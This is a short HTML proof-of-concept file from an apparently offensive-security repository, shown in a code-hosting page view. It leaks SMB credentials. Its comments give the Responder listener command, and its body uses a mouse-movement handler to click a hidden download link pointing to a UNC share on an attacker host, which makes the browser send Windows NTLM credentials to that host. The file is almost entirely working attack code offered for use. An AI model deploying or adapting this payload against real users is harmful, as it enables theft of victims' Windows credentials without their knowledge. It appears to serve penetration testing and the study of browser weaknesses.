mgeeky-Penetration-Testing-.../networks/smb-credential-leak.html

6 lines
315 B
HTML
Raw Normal View History

2018-02-02 22:22:43 +01:00
<!-- PoC for leaking SMB Credentials with listening Responder -->
<!-- as presented by X41 D-Sec GmbH in Browser Security White Paper. -->
<!-- To be used as: $ `responder -I eth0 -w -r f -v` -->
<body onmousemove="document.getElementById(6).click()">
<a id=6 href="\\192.168.56.101\edgeleak" download></a>
</body>